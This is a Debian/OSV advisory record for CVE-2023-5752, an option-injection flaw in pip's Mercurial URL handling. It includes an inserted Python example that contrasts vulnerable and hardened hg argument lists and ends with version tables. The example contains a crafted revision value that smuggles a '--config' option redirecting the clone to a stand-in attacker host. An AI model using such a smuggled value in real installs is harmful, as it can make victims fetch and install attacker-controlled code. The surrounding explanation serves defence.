DEBIAN-CVE-2023-5752

Source
https://security-tracker.debian.org/tracker/CVE-2023-5752
Import Source
https://storage.googleapis.com/debian-osv/debian-cve-osv/DEBIAN-CVE-2023-5752.json
JSON Data
https://api.osv.dev/v1/vulns/DEBIAN-CVE-2023-5752
Published
2023-10-25T18:17:44.867Z
Modified
2025-11-20T10:17:38.722172Z
Severity
  • 3.3 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Summary
[none]
Details

When installing a package from a Mercurial VCS URL (i.e. "pip install hg+...") with pip prior to v23.3, the Mercurial revision given in the URL could be used to inject arbitrary configuration options into the "hg clone" call (i.e. "--config"). Controlling the Mercurial configuration can change how, and which, repository is installed. This vulnerability does not affect users who are not installing from Mercurial.
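The injection shape the advisory describes, modelled on the argument lists a VCS backend hands to subprocess. This is an added example, not pip's code: the requirement URL, the "--config=paths.default=..." revision, the helper names and the accepted revision character set are all assumptions made here. Nothing is executed and Mercurial is not needed; the point is that a revision copied out of "hg+<url>@<rev>" and passed as a bare token is parsed as an option, whereas a validated value bound to "--rev=" is not.

```python
"""Argument-injection model for CVE-2023-5752 (added example, not pip's code)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit, urlunsplit

# Constructed sample input: what an attacker-controlled requirement could look like.
# The revision part mirrors the advisory's "--config" injection and redirects
# paths.default, i.e. it changes which repository is used.
MALICIOUS_REQ = (
    "hg+https://example.invalid/repo"
    "@--config=paths.default=https://attacker.invalid/repo"
)
BENIGN_REQ = "hg+https://example.invalid/repo@3f2a1b"

# Options the backend itself intends to pass; anything else that parses as an
# option came from untrusted input. Assumed set for this example.
INTENDED_OPTIONS = frozenset({"-q", "--noupdate", "--rev"})

# Hashes, tags, bookmarks and branch names as pip users normally write them.
# The character set is an assumption, deliberately narrow; note the first
# character may not be "-", so nothing here can ever be read as an option.
_REV_RE = re.compile(r"[A-Za-z0-9@][A-Za-z0-9._+/:@-]*")


def split_vcs_url(requirement: str) -> Tuple[str, Optional[str]]:
    """Split 'hg+<url>[@<rev>]' into (clone_url, rev).

    Simplified model of the pip URL form: the '@rev' suffix is taken from the
    path component only, so userinfo in the netloc is never mistaken for it.
    """
    if not requirement.startswith("hg+"):
        raise ValueError("not a Mercurial VCS requirement")
    parts = urlsplit(requirement[len("hg+"):])
    path, rev = parts.path, None
    if "@" in path:
        path, rev = path.rsplit("@", 1)
    return urlunsplit(parts._replace(path=path)), rev


def vulnerable_update_argv(rev: str) -> List[str]:
    """Pre-fix shape: the revision is a bare token after the command.

    An option parser sees a token starting with '--' as an option, so an
    attacker-chosen '--config=...' is honoured instead of being a revision.
    """
    return ["hg", "update", "-q", rev]


def is_safe_rev(rev: str) -> bool:
    """True when rev matches the narrow revision grammar above."""
    return _REV_RE.fullmatch(rev) is not None


def hardened_update_argv(rev: str) -> List[str]:
    """Validate the revision, then bind it to --rev with '=' so it is never a
    standalone token the parser can reinterpret."""
    if not is_safe_rev(rev):
        raise ValueError(f"refusing suspicious Mercurial revision: {rev!r}")
    return ["hg", "update", "-q", f"--rev={rev}"]


def injected_options(argv: List[str]) -> List[str]:
    """Audit helper: tokens after the subcommand that parse as options but
    were not intended by the caller (compares the part before any '=')."""
    return [
        a for a in argv[2:]
        if a.startswith("-") and a.split("=", 1)[0] not in INTENDED_OPTIONS
    ]


if __name__ == "__main__":
    for req in (BENIGN_REQ, MALICIOUS_REQ):
        url, rev = split_vcs_url(req)
        argv = vulnerable_update_argv(rev)
        print(f"{url}  rev={rev!r}")
        print("  vulnerable argv:", argv, "injected:", injected_options(argv))
        try:
            print("  hardened argv:  ", hardened_update_argv(rev))
        except ValueError as exc:
            print("  hardened argv:   rejected ->", exc)
```

The validation step does the real work: binding the value with "--rev=" stops the token itself from being parsed as an option, but only the allowlist guarantees that no other character in the revision (a space, a second "--") can reach a different layer of Mercurial's own parsing, which this example does not model.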

Affected packages

Debian:11 / python-pip

Package

Name
python-pip
Purl
pkg:deb/debian/python-pip?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
20.3.4-4+deb11u2

Affected versions

20.*

20.3.4-4
20.3.4-4+deb11u1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Debian:12 / python-pip

Package

Name
python-pip
Purl
pkg:deb/debian/python-pip?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)

Affected versions

23.*

23.0.1+dfsg-1
23.1.2+dfsg-1
23.1.2+dfsg-2
23.2+dfsg-1
23.2.1+dfsg-1
23.3+dfsg-1

24.*

24.0+dfsg-1
24.0+dfsg-2
24.1+dfsg-1
24.1.1+dfsg-1
24.2+dfsg-1
24.3.1+dfsg-1

25.*

25.0+dfsg-1
25.0.1+dfsg-1
25.1+dfsg-1
25.1.1+dfsg-1
25.2+dfsg-1
25.3+dfsg-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Debian:13 / python-pip

Package

Name
python-pip
Purl
pkg:deb/debian/python-pip?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
23.3+dfsg-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Debian:14 / python-pip

Package

Name
python-pip
Purl
pkg:deb/debian/python-pip?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
23.3+dfsg-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}